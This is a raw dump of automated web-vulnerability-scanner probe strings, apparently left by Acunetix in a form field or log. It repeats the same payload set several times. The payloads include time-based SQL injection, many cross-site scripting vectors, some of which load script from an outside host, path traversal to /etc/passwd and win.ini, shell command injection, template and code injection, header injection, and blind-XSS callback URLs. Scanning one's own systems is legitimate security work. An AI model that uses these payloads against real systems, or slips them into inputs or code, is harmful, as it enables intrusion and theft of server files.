if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973085)"></g></svg>

1

WEB-INF\web.xml

1

1

'

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<div style=width:expression(prompt(947556))>

1

/etc/passwd

1

-1

1

1

1

1

1<iframe src='data:text/html

1

1

"

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<body onload=prompt(949907)>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

1

||cat /etc/passwd

UTHbLRCm'

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(942394)>

'"()

1

1

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

l2kcJJA7')

1

1

1<img src=xyz OnErRor=prompt(928337)>

1

1

PvdwUqF2'))

'

1

1<img/src=">" onerror=alert(957435)>

1

'&dir&'

1

1

"

-1

1

file:///etc/passwd

1

"&dir&"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

http://hitd4ROWLT3gu.bxss.me/

-1)

${@print(md5(acunetix_wvs_security_test))}

1<ScRiPt%20>prompt(984061)</sCripT>

acunetix_wvs_invalid_filename

1

1

|dir

1

/\../\../\../\../\../\../\../etc/passwd

-1))

1

1&lt

comments

${@print(md5(acunetix_wvs_security_test))}\

'|dir

YH1MYb6f'

1

1

\xf6<img acu onmouseover=prompt(905090) //\xf6>

comments

1

1

WEB-INF/web.xml

"|dir

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

PXFtOqtK')

1<input autofocus onfocus=prompt(996396)>

1

comments/.

1

WEB-INF\web.xml

1

qjiV3jLf'))

<a href='http://www.acunetix.com'>website security</a>

1

1

http://www.acunetix.tst

1

../../../../../../../../../../windows/win.ini

1

1

[url=http://www.acunetix.com]website security[/url]

1

'"

1_Okmpk <ScRiPt >prompt(989634)</ScRiPt>

1

1

1

<!--

../../../../../../../../../../boot.ini

1

1

1

1

1

1

1

response.write(9954827*9178439)

../../../../../../../../../../windows/win.ini.jpg

1

1

1'"()&%<ScRiPt >prompt(921462)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

'+response.write(9954827*9178439)+'

1

1

1

'"()&%<ScRiPt >prompt(901507)</ScRiPt>

1

1

"+response.write(9954827*9178439)+"

1

1

................windowswin.ini

1_961527

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..\..\..\..\..\..\..\..\windows\win.ini

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

../../../../../../../../../../etc/passwd

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99519+100268}

`cat /etc/passwd`

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

WEB-INF/web.xml

1

1&n941074=v942389

acu1094\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1094

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

testasp.vulnweb.com

acux4317\xc0\xbez1\xc0\xbcz2a\x90bcxuca4317

WEB-INF\web.xml

1

'|'ld

1

1

1

1<ScRiPt >prompt(994627)</ScRiPt>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

"|"ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

)

1

1

1

1<script>prompt(919362)</script>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

!(()&&!|*|*|

1

1

/etc/passwd

1

1

1<ScRiPt >prompt(934843)</ScRiPt>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

^(#$!@#$)(()))******

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?956272></ScRiPt>

-1

'

1

1

1

1

1<ScRiPt >prompt(981221)</ScRiPt>

"

1

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

'"()

1<video><source onerror="javascript:prompt(917408)">

1

1

||cat /etc/passwd

-1))

'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(934313)"></g></svg>

1

1

"

SSSWPR6L'

&dir

1

1

1<div style=width:expression(prompt(925812))>

1

07N9Bg27')

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

1<iframe src='data:text/html

file:///etc/passwd

'&dir&'

1

oxb3PtO9'))

${@print(md5(acunetix_wvs_security_test))}\

http://hitDUp99IKGgB.bxss.me/

1

1

acunetix_wvs_invalid_filename

1<body onload=prompt(936518)>

/\../\../\../\../\../\../\../etc/passwd

-1

"&dir&"

1

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(982845)>

1

comments

1

WEB-INF/web.xml

-1)

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1<img src=xyz OnErRor=prompt(985374)>

|dir

-1))

1

http://www.acunetix.tst

'"

WEB-INF\web.xml

comments/.

2AKwQIUj'

1

1

1<img/src=">" onerror=alert(986063)>

1

'|dir

1

1'"()&%<ScRiPt >prompt(927185)</ScRiPt>

<!--

1

ug3jz6sX')

../../../../../../../../../../windows/win.ini

1

'"()&%<ScRiPt >prompt(980616)</ScRiPt>

1

1<ScRiPt%20>prompt(933884)</sCripT>

"|dir

../../../../../../../../../../boot.ini

1

1

ZtndmfYy'))

1&lt

1

1_972899

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

response.write(9654255*9593912)

\xf6<img acu onmouseover=prompt(950062) //\xf6>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

&cat /etc/passwd&

'+response.write(9654255*9593912)+'

1<input autofocus onfocus=prompt(923252)>

1

1

1

"+response.write(9654255*9593912)+"

<a href='http://www.acunetix.com'>website security</a>

................windowswin.ini

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

[url=http://www.acunetix.com]website security[/url]

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1_mok6N <ScRiPt >prompt(938151)</ScRiPt>

cat /etc/passwd

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

../../../../../../../../../../etc/passwd

1

1

1

`cat /etc/passwd`

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

|cat /etc/passwd#

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'|'ld

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99561+99925}

1

acu9587\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9587

1

"|"ld

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

acux2087\xc0\xbez1\xc0\xbcz2a\x90bcxuca2087

1

1

WEB-INF/web.xml

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt >prompt(985529)</ScRiPt>

1&n949839=v952952

WEB-INF\web.xml

1

1

1some_inexistent_file_with_long_name%00.jpg

1

'

1<script>prompt(958673)</script>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<ScRiPt >prompt(978601)</ScRiPt>

/etc/passwd

"

1

1

)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?911970></ScRiPt>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

testasp.vulnweb.com

1

||cat /etc/passwd

!(()&&!|*|*|

1

1

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

&dir

1

^(#$!@#$)(()))******

1<ScRiPt >prompt(934515)</ScRiPt>

-1)

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1<video><source onerror="javascript:prompt(973181)">

1

'&dir&'

-1))

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

"&dir&"

TQjaWHe2'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(964210)"></g></svg>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

'"()

1

1<div style=width:expression(prompt(910166))>

K9Abyeox')

|dir

1

1

file:///etc/passwd

1

'

1

'|dir

gaKhDS5Y'))

http://hit3yZeAgSPq1.bxss.me/

1<iframe src='data:text/html

1

/\../\../\../\../\../\../\../etc/passwd

"

acunetix_wvs_invalid_filename

1

1

-1

"|dir

1

1<body onload=prompt(930605)>

1

${@print(md5(acunetix_wvs_security_test))}

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1)

WEB-INF/web.xml

comments

1

${@print(md5(acunetix_wvs_security_test))}\

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973817)>

1

1

-1))

1

1

WEB-INF\web.xml

comments

http://www.acunetix.tst

1

13CtiEOC'

'"

1'"()&%<ScRiPt >prompt(994530)</ScRiPt>

1<img src=xyz OnErRor=prompt(908438)>

1

../../../../../../../../../../windows/win.ini

comments/.

<!--

1

1

1<img/src=">" onerror=alert(917630)>

1

px8xLz0i')

'"()&%<ScRiPt >prompt(900213)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1

1_981399

jjHnlxDa'))

1

1<ScRiPt%20>prompt(995274)</sCripT>

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1&lt

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

response.write(9729011*9028120)

1

\xf6<img acu onmouseover=prompt(997820) //\xf6>

1

1

1

'+response.write(9729011*9028120)+'

................windowswin.ini

1

1

1<input autofocus onfocus=prompt(929523)>

&cat /etc/passwd&

1

"+response.write(9729011*9028120)+"

..\..\..\..\..\..\..\..\windows\win.ini

<a href='http://www.acunetix.com'>website security</a>

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

[url=http://www.acunetix.com]website security[/url]

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1_7ldju <ScRiPt >prompt(958095)</ScRiPt>

1

cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

acu4462\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4462

1

1

1

1

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

acux10951\xc0\xbez1\xc0\xbcz2a\x90bcxuca10951

1

1

../../../../../../../../../../etc/passwd.jpg

WEB-INF/web.xml

1

|cat /etc/passwd#

1

1

1<ScRiPt >prompt(913661)</ScRiPt>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

WEB-INF\web.xml

1<script>prompt(953573)</script>

1

1

'|'ld

1<ScRiPt >prompt(920306)</ScRiPt>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${100422+100226}

1

1

1

"|"ld

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?913361></ScRiPt>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<ScRiPt >prompt(980033)</ScRiPt>

1

1&n971977=v969410

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1

1

-1

1<video><source onerror="javascript:prompt(976215)">

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/etc/passwd

'

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(971115)"></g></svg>

-1)

)

1

1

1

1

testasp.vulnweb.com

-1))

!(()&&!|*|*|

"

1

1<div style=width:expression(prompt(921464))>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<iframe src='data:text/html

^(#$!@#$)(()))******

3KE1AWh7'

1

1

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1<body onload=prompt(943448)>

1

iAAw6YQU')

1

1

&dir

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(917545)>

1

1

1

1

X0GORfXy'))

'"()

1<img src=xyz OnErRor=prompt(938374)>

'&dir&'

1

1

1

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<img/src=">" onerror=alert(930453)>

"&dir&"

1

file:///etc/passwd

'

1<ScRiPt%20>prompt(925861)</sCripT>

1

-1)

http://hit5K3HF3ysgI.bxss.me/

1

1

/\../\../\../\../\../\../\../etc/passwd

"

|dir

acunetix_wvs_invalid_filename

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

1&lt

1

${@print(md5(acunetix_wvs_security_test))}

WEB-INF/web.xml

1

'|dir

comments

1

http://www.acunetix.tst

G3BQQJv2'

\xf6<img acu onmouseover=prompt(980854) //\xf6>

${@print(md5(acunetix_wvs_security_test))}\

'"

1<input autofocus onfocus=prompt(937161)>

WEB-INF\web.xml

1

"|dir

1'"()&%<ScRiPt >prompt(980790)</ScRiPt>

comments

1

MGVnY9wa')

1

<!--

<a href='http://www.acunetix.com'>website security</a>

uSilwbzL'))

comments/.

'"()&%<ScRiPt >prompt(963931)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

1

1

1_939099

../../../../../../../../../../boot.ini

1

1

1_FDPrw <ScRiPt >prompt(953494)</ScRiPt>

1

response.write(9741181*9836027)

../../../../../../../../../../windows/win.ini.jpg

1

1

1

'+response.write(9741181*9836027)+'

1

1

1

1

1

"+response.write(9741181*9836027)+"

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

1

&cat /etc/passwd&

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../../../../../../../../../../etc/passwd.jpg

${99915+99941}

1

cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

acu7858\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7858

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

`cat /etc/passwd`

1

acux3290\xc0\xbez1\xc0\xbcz2a\x90bcxuca3290

1&n900191=v952056

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1

WEB-INF/web.xml

1

1<ScRiPt >prompt(964824)</ScRiPt>

1

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

'|'ld

WEB-INF\web.xml

1

1<script>prompt(914039)</script>

testasp.vulnweb.com

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1<ScRiPt >prompt(943896)</ScRiPt>

1

)

1

1

"|"ld

/etc/passwd

1

-1

1

!(()&&!|*|*|

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?965530></ScRiPt>

1

1

1

-1)

1

1<ScRiPt >prompt(912233)</ScRiPt>

1

^(#$!@#$)(()))******

1

1<video><source onerror="javascript:prompt(918486)">

1

1

-1))

1

1

1

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(991884)"></g></svg>

1

P5FULgNb'

1

1

1

"

1<div style=width:expression(prompt(910707))>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1

FwKFnmDM')

1

1

1

'"()

1<iframe src='data:text/html

http://testasp.vulnweb.com/t/xss.html?%00.jpg

LyyoUwpX'))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'

1<body onload=prompt(944661)>

1

1

1

1

"

1

-1

&dir

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(979026)>

http://hitkK799tRxmA.bxss.me/

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

'&dir&'

1<img src=xyz OnErRor=prompt(974555)>

-1)

file:///etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1<img/src=">" onerror=alert(966448)>

-1))

1

comments

http://www.acunetix.tst

1

|dir

HjsZCFHV'

1<ScRiPt%20>prompt(913489)</sCripT>

'"

WEB-INF/web.xml

1

1'"()&%<ScRiPt >prompt(965100)</ScRiPt>

comments

1

o9lmdYeD')

WEB-INF\web.xml

'|dir

1&lt

<!--

1

FOjbbucn'))

comments/.

'"()&%<ScRiPt >prompt(964431)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

1

\xf6<img acu onmouseover=prompt(935569) //\xf6>

1

1

1_972679

1

"|dir

1

1

1

../../../../../../../../../../boot.ini

1

1<input autofocus onfocus=prompt(910614)>

response.write(9972841*9928591)

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

'+response.write(9972841*9928591)+'

1

../../../../../../../../../../windows/win.ini.jpg

&cat /etc/passwd&

"+response.write(9972841*9928591)+"

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

'&cat /etc/passwd&'

1_AjqCM <ScRiPt >prompt(971331)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

................windowswin.ini

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

..\..\..\..\..\..\..\..\windows\win.ini

1

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

`cat /etc/passwd`

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

1

${100358+99253}

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'|'ld

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

acu10494\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10494

1some_inexistent_file_with_long_name%00.jpg

1&n927198=v945025

1

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

acux6648\xc0\xbez1\xc0\xbcz2a\x90bcxuca6648

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

testasp.vulnweb.com

1

1

1

1<ScRiPt >prompt(969357)</ScRiPt>

1

WEB-INF\web.xml

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<script>prompt(904127)</script>

1

1

1

1

'

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

)

1

1

1

1<ScRiPt >prompt(962620)</ScRiPt>

1

/etc/passwd

1

!(()&&!|*|*|

"

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?906146></ScRiPt>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

||cat /etc/passwd

^(#$!@#$)(()))******

1

1

-1

'"()

1<ScRiPt >prompt(947455)</ScRiPt>

1

1

1

1

&dir

-1)

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1<video><source onerror="javascript:prompt(902847)">

1

1

'&dir&'

1

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(935125)"></g></svg>

1

1

1

1

E98Lxau1'

"&dir&"

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<div style=width:expression(prompt(944683))>

dYJadZ4K')

1

|dir

1

'

16lM4OwR'))

1<iframe src='data:text/html

1

acunetix_wvs_invalid_filename

1

'|dir

1

"

-1

1

comments

1<body onload=prompt(929510)>

http://hit8fckGCGRP0.bxss.me/

file:///etc/passwd

-1)

1

"|dir

${@print(md5(acunetix_wvs_security_test))}

1

-1))

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(907373)>

comments

/\../\../\../\../\../\../\../etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

${@print(md5(acunetix_wvs_security_test))}\

9IMFfHO8'

WEB-INF/web.xml

1

1<img src=xyz OnErRor=prompt(987234)>

comments/.

http://www.acunetix.tst

crGgJrS1')

'"

1

1

WEB-INF\web.xml

1

1

1<img/src=">" onerror=alert(925851)>

1

1

<!--

dHeaY3jD'))

1'"()&%<ScRiPt >prompt(934464)</ScRiPt>

1<ScRiPt%20>prompt(924443)</sCripT>

1

../../../../../../../../../../windows/win.ini

1

1

'"()&%<ScRiPt >prompt(927393)</ScRiPt>

1

1

1

1&lt

1

../../../../../../../../../../boot.ini

1

1

1_909321

1

\xf6<img acu onmouseover=prompt(997487) //\xf6>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<input autofocus onfocus=prompt(936464)>

response.write(9222937*9061442)

1

1

<a href='http://www.acunetix.com'>website security</a>

&cat /etc/passwd&

'+response.write(9222937*9061442)+'

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

[url=http://www.acunetix.com]website security[/url]

1

"+response.write(9222937*9061442)+"

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

................windowswin.ini

1

1_IBpVQ <ScRiPt >prompt(952266)</ScRiPt>

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

`cat /etc/passwd`

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../../../../../../../../../../etc/passwd

1

1

1

1

1

|cat /etc/passwd#

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

acu6410\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6410

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99151+99575}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

acux2555\xc0\xbez1\xc0\xbcz2a\x90bcxuca2555

'|'ld

1

../../../../../../../../../../etc/passwd.jpg

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt >prompt(979532)</ScRiPt>

"|"ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n972874=v903341

1some_inexistent_file_with_long_name%00.jpg

1

1

WEB-INF/web.xml

1<script>prompt(947552)</script>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

